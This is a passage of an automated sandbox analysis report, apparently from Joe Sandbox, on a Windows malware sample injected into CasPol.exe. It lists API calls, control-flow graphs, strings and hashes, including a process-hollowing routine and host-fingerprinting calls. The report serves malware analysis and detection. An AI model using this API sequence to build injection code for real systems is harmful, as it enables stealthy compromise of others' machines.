                                                                                                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                    • API String ID: 384173800-625181639
                                                                                                                    • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                    • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                                                                                    • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                    • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 447 417245-417262 448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448 449 4175cd 448->449 450 4172df-4172e6 448->450 452 4175cf-4175d9 449->452 450->449 451 4172ec-4172f3 450->451 451->449 453 4172f9-4172fb 451->453 453->449 454 417301-41732d call 436060 * 2 453->454 454->449 459 417333-41733e 454->459 459->449 460 417344-417374 CreateProcessW 459->460 461 4175c7 GetLastError 460->461 462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462 461->449 463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463 464 4173a8-4173c8 ReadProcessMemory 462->464 463->449 464->463 465 4173ce-4173ee NtCreateSection 464->465 465->463 466 4173f4-417401 465->466 467 417403-41740e NtUnmapViewOfSection 466->467 468 417414-417436 NtMapViewOfSection 466->468 467->468 469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469 470 417438-417466 VirtualFree NtClose TerminateProcess 468->470 472 417591 469->472 473 4174a4-4174a6 469->473 470->449 471 41746c-417472 470->471 471->448 472->463 474 4174a8-4174ac 473->474 475 4174af-4174d6 call 435ae0 473->475 474->475 478 417516-417520 475->478 479 4174d8-4174e2 475->479 481 417522-417528 478->481 482 41753e-417542 478->482 480 4174e6-417509 call 435ae0 479->480 493 41750b-417512 480->493 481->482 486 41752a-41753b call 417651 481->486 483 417544-417560 WriteProcessMemory 482->483 484 417566-41757d Wow64SetThreadContext 482->484 483->463 487 417562 483->487 484->463 488 41757f-41758b ResumeThread 484->488 486->482 487->484 488->463 492 41758d-41758f 488->492 492->452 493->478
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
                                                                                                                    • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                    • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                    • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                    • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                    • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                    • API String ID: 3150337530-3035715614
                                                                                                                    • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                    • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                    • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                    • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1484 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1491 10001177-1000119e lstrlenW FindFirstFileW 1484->1491 1492 10001168-10001172 lstrlenW 1484->1492 1493 100011a0-100011a8 1491->1493 1494 100011e1-100011e9 1491->1494 1492->1491 1495 100011c7-100011d8 FindNextFileW 1493->1495 1496 100011aa-100011c4 call 10001000 1493->1496 1495->1493 1498 100011da-100011db FindClose 1495->1498 1496->1495 1498->1494
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1083526818-0
                                                                                                                    • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                    • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                    • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                    • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                      • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                      • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                    • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                    • API String ID: 2281282204-3981147832
                                                                                                                    • Opcode ID: 8b57bce22a9f6d76fda62625c2c9eda57b428cac8fd47ef44d4eceb6ac03292f
                                                                                                                    • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                    • Opcode Fuzzy Hash: 8b57bce22a9f6d76fda62625c2c9eda57b428cac8fd47ef44d4eceb6ac03292f
                                                                                                                    • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                    • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3525466593-0
                                                                                                                    • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                    • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                                    • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                    • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                    Strings
                                                                                                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$EventLocalThreadTime
                                                                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                    • API String ID: 2532271599-1507639952
                                                                                                                    • Opcode ID: 1ad6a2ad94e4569e09952a4ded336d3c2f1fb57938f862c7e125ba59f66ea787
                                                                                                                    • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                                                                                    • Opcode Fuzzy Hash: 1ad6a2ad94e4569e09952a4ded336d3c2f1fb57938f862c7e125ba59f66ea787
                                                                                                                    • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                                                                                    APIs
                                                                                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1815803762-0
                                                                                                                    • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                    • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                                    • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                    • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                                    APIs
                                                                                                                    • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7CF
                                                                                                                    • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$ComputerUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4229901323-0
                                                                                                                    • Opcode ID: b63fbe807418eda0a9fc1ee5865018707abb86735c4632f840b1adfcf73bb3ed
                                                                                                                    • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                    • Opcode Fuzzy Hash: b63fbe807418eda0a9fc1ee5865018707abb86735c4632f840b1adfcf73bb3ed
                                                                                                                    • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2299586839-0
                                                                                                                    • Opcode ID: 31219136052544a26d77da0625eb89f11a5a625e23b8e682f5fa2601c68a04a1
                                                                                                                    • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                    • Opcode Fuzzy Hash: 31219136052544a26d77da0625eb89f11a5a625e23b8e682f5fa2601c68a04a1
                                                                                                                    • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 48 40dc96-40dca7 call 401eea 23->48 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 79->90 91 40d9ae-40d9b0 79->91 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 95 40d9c0-40d9cc call 41a473 90->95 96 40d9be 90->96 94 40dc95 91->94 94->48 103 40d9d5-40d9d9 95->103 104 40d9ce-40d9d0 95->104 96->95 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 128 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 129 40da2d call 4069ba 107->129 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 128->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 128->164 129->128 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 166 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 191 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->191 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 166->219 168 40dbb1-40dbbb call 4082d7 167->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->169 178 40dbc0-40dbe4 call 4022f8 call 4338d8 168->178 169->178 199 40dbf3 178->199 200 40dbe6-40dbf1 call 436060 178->200 191->163 202 40dbf5-40dc40 call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 199->202 200->202 257 40dc45-40dc6a call 4338e1 call 401d64 call 40b125 202->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41bec0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 280->331 292->94 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 354->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 414 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 415->102 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                      • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                      • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                      • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
